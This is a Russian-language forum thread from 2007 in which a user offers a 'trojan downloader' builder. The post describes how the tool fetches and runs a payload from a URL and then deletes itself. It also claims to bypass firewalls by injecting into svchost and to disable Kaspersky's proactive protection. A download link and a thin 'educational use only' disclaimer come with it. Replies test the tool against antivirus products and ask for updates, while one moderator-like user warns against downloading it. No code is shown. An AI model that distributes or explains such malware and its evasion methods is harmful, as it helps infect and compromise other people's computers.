ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Защита ОС: вирусы, антивирусы, файрволы.
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Builder trojan downloader
  #1  
Старый 06.07.2007, 04:50
Аватар для os1r1s
os1r1s
Познающий
Регистрация: 02.02.2007
Сообщений: 41
Провел на форуме:
240788

Репутация: 69
По умолчанию Builder trojan downloader

Builder trojan downloader v1.2




Даунлоадер - загружает на зараженный компьютер файл (например ваш трой) с url-a указанного в билдере.

Принцип работы:
После запуска сливает файл с url-a и сохраняет на зараженый компьютер
в директорию заданную билдером (например в папку винды), и запускает ваш файл.
После запуска вашего файла удаляет свое тело.


Там есть обход фаеров путем инжекта в доверенный процесс svchost, и вырубка проактивки касперского, путем восстановления оригинальной sdt.

Это публичная версия, толком не тестировал, используйте на свой страх и риск.
Пишите свои пожелания и предложения
Качать тут

Обсуждение на secnull

ПРИВЕДЕННАЯ ПРОГРАММА МОЖЕТ БЫТЬ ИСПОЛЬЗОВАНА ТОЛЬКО В УЧЕБНО-ПОЗНАВАТЕЛЬНЫХ ЦЕЛЯХ!
Так что если вы собираетесь нарушать закон, то автор программы не несет за это никакой
ответственности!

Последний раз редактировалось os1r1s; 06.07.2007 в 22:31..
 
Ответить с цитированием

  #2  
Старый 06.07.2007, 08:08
Аватар для access_denied
access_denied
Banned
Регистрация: 03.07.2007
Сообщений: 14
Провел на форуме:
98826

Репутация: -14
Отправить сообщение для access_denied с помощью ICQ
По умолчанию

Что то как то стремно ее от тебя с такой репутацией качать
 
Ответить с цитированием

  #3  
Старый 06.07.2007, 08:10
Аватар для a1ex
a1ex
Banned
Регистрация: 11.10.2006
Сообщений: 682
Провел на форуме:
3750406

Репутация: 271


Отправить сообщение для a1ex с помощью ICQ Отправить сообщение для a1ex с помощью AIM Отправить сообщение для a1ex с помощью MSN Отправить сообщение для a1ex с помощью Yahoo
По умолчанию

Цитата:
Что то как то стремно ее от тебя с такой репутацией качать
Проверь на вирусняГи.
 
Ответить с цитированием

  #4  
Старый 06.07.2007, 08:15
Аватар для Alexsize
Alexsize
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375

Репутация: 4268


По умолчанию

Вообще темы вредоносного ПО администрацией на поощряються. Одно дело, когда его пишут "наши", как пример программирования, вместе с исходниками, другое дело, когда выкладываеться вредоносный софт фиг знает кем и с каким содержанием.
НЕ КАЧАЙТЕ ЭТУ ЧУШЬ.
__________________
...
 
Ответить с цитированием

  #5  
Старый 06.07.2007, 14:33
Аватар для _kREveDKo_
_kREveDKo_
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479

Репутация: 3813


По умолчанию

Насклько я понимаю логику событий, то даунлоадер должен вывести в накаут антивирусы а фаерволлы, чтобы действительно вредоносная программа могла спокойна загрузиться на комп и не быть замеченой для антивирусов и прочей лажи. Про это в топике ни слова не сказано - это раз.


[upd]
Топикстартер и есть автор. Линк на описание №2 :
http://secnull.info/index.php?showtopic=754

Последний раз редактировалось b00zy_c0d3r; 06.07.2007 в 15:28..
 
Ответить с цитированием

  #6  
Старый 06.07.2007, 15:03
Аватар для vasya_rogov
vasya_rogov
Познающий
Регистрация: 25.06.2007
Сообщений: 34
Провел на форуме:
50534

Репутация: -7
Thumbs up

ну че чисто ?
если так то аффтор давай зачетку

только ты говоришь про инжект в процесс..
он как рандомно сам выбирает куда внедряцца или что
просто на скрине не видно

и как обходица проактивка .. автоклик небось ?

Последний раз редактировалось vasya_rogov; 06.07.2007 в 17:30..
 
Ответить с цитированием

  #7  
Старый 06.07.2007, 15:08
Аватар для access_denied
access_denied
Banned
Регистрация: 03.07.2007
Сообщений: 14
Провел на форуме:
98826

Репутация: -14
Отправить сообщение для access_denied с помощью ICQ
По умолчанию

попробовал запустить со включеным фаерволом собственнного написания(ВыдерниШнурИзСе евой v 1.0) на VMWare

вроде компилит, но пока отчетов не приходило
 
Ответить с цитированием

  #8  
Старый 12.07.2007, 03:17
Аватар для vasya_rogov
vasya_rogov
Познающий
Регистрация: 25.06.2007
Сообщений: 34
Провел на форуме:
50534

Репутация: -7
По умолчанию

проактивка 7 касперчега говорит об доступе к памяти

NOD32 IMON файл http://*****.ru/123.exe вероятно модифицированный Win32/Statik троян

а сам нод его не палит тока его интернет монитор

Последний раз редактировалось vasya_rogov; 12.07.2007 в 17:43..
 
Ответить с цитированием

  #9  
Старый 17.07.2007, 02:01
Аватар для Zedo83
Zedo83
Познающий
Регистрация: 14.07.2007
Сообщений: 90
Провел на форуме:
108080

Репутация: 47
По умолчанию

когда ждать обновление ?
 
Ответить с цитированием

  #10  
Старый 17.07.2007, 14:16
Аватар для vasya_rogov
vasya_rogov
Познающий
Регистрация: 25.06.2007
Сообщений: 34
Провел на форуме:
50534

Репутация: -7
По умолчанию

+1
ждем обновления
FUCK Outpost, FUCK KIS 7
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Можете дать пару сплойтов на IE 6/7 Trojan Downloader Adio Уязвимости 5 19.02.2007 21:25
Порты троянов bxN5 Защита ОС: вирусы, антивирусы, файрволы. 4 06.05.2006 22:03
Trojan Downloader De_X Защита ОС: вирусы, антивирусы, файрволы. 18 16.04.2006 09:22
Вирус? PSalm69 Болталка 7 16.11.2005 13:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ